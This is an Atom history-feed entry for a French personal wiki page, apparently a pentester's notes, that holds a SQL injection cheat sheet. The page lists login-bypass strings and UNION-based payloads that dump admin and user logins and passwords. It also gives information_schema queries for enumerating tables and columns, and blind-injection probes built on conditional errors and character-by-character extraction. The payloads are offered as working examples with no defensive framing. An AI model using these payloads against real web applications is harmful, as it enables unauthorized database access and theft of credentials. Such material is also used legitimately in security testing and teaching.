https://futex.re/mediawiki/index.php?action=history&feed=atom&title=1.1_Exemples_utiles1.1 Exemples utiles - Historique des versions2026-05-13T15:38:26ZHistorique des versions pour cette page sur le wikiMediaWiki 1.39.17https://futex.re/mediawiki/index.php?title=1.1_Exemples_utiles&diff=1557&oldid=prevFutex le 11 juin 2012 à 19:162012-06-11T19:16:14Z<p></p>
<p><b>Nouvelle page</b></p><div>Marche toujours<br />
<br />
'='<br />
'OR 1=1<br />
'OR a=a<br />
'OR'<br />
'OR''='<br />
'OR"="<br />
'OR'="<br />
'OR '="<br />
'OR "='<br />
'OR ''='<br />
'OR '=''<br />
'OR "=''<br />
'OR ''="<br />
<br />
En ce moment, un nouveau type est à la mode, les UNION qui imposent de connaitre un minimum la morphologie de la requête, ou du moins de la deviner :<br />
UNION ALL SELECT pseudo,password FROM admins<br />
UNION ALL SELECT pseudo,password FROM admins WHERE pseudo='OR 1=1# AND password='OR ''="<br />
UNION ALL SELECT pseudo,password FROM admins WHERE pseudo='OR "=' AND password='OR "='<br />
<br />
<br />
Afficher les bases de données<br />
SHOW DATABASES <br />
<br />
Afficher les tables<br />
SHOW TABLES [FROM $DATABASE]<br />
<br />
Afficher les colonnes:<br />
SHOW COLUMNS FROM $TABLE<br />
<br />
Determiner le nombre de champs:<br />
<br />
' ORDER BY X #<br />
<br />
Compter le nombre de colonnes<br />
SELECT COUNT(*)<br />
FROM INFORMATION_SCHEMA.COLUMNS<br />
WHERE TABLE_NAME = '$TABLE'<br />
<br />
Union select:<br />
<br />
' AND 1=0 UNION SELECT 1,2,3,4 #<br />
<br />
Nombre de tables<br />
<br />
' AND 1=0 UNION SELECT 1,(SELECT COUNT(*) FROM information_schema.TABLES WHERE table_schema=DATABASE()),3,4 #<br />
<br />
Lister les tables<br />
<br />
' AND 1=0 UNION SELECT 1,(SELECT GROUP_CONCAT(table_name) FROM information_schema.TABLES WHERE table_schema=DATABASE()),3,4 #<br />
<br />
<br />
Lister les champs d'une table<br />
<br />
(SELECT GROUP_CONCAT(column_name) FROM information_schema.COLUMNS WHERE table_name=0x7573657273 AND table_schema=DATABASE()),3,4 #<br />
<br />
Trouver le mot de passe de JohnDoe<br />
<br />
' AND 1=0 UNION SELECT 1,(SELECT password FROM users WHERE login='JohnDoe'),3,4 #<br />
<br />
Recuperer les comptes<br />
<br />
' AND 1=0 UNION SELECT 1,(SELECT GROUP_CONCAT(login,':',password,'\n') FROM users),3,4 #<br />
<br />
Erreurs conditionnelles:<br />
<br />
(SELECT IF(Condition,(SELECT 0 UNION ALL SELECT 0),0))<br />
<br />
(SELECT IF((1<0),(SELECT 0 UNION ALL SELECT 0),0))<br />
<br />
-----------------------------<br />
Code ascii: ORD(caractere)<br />
<br />
Extraire un caractère: SUBSTRING(texte,debut,1) (ca commence à 1)<br />
-----------------------------<br />
<br />
<br />
Test de la version en Blind SQL Injection<br />
<br />
(SELECT IF( ORD(SUBSTRING(@@VERSION,1,1))=53,(SELECT 0 UNION ALL SELECT 0),0))<br />
<br />
=> Version 5.X<br />
<br />
Recuperation du premier caractère de la première table<br />
<br />
(SELECT ORD(SUBSTRING(table_name,1,1)) FROM information_schema.TABLES LIMIT 1)<br />
(SELECT IF( (SELECT ORD(SUBSTRING(table_name,1,1)) FROM information_schema.TABLES LIMIT 1)<128,(SELECT 0 UNION ALL SELECT 0),0))<br><br><br />
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26</div>Futex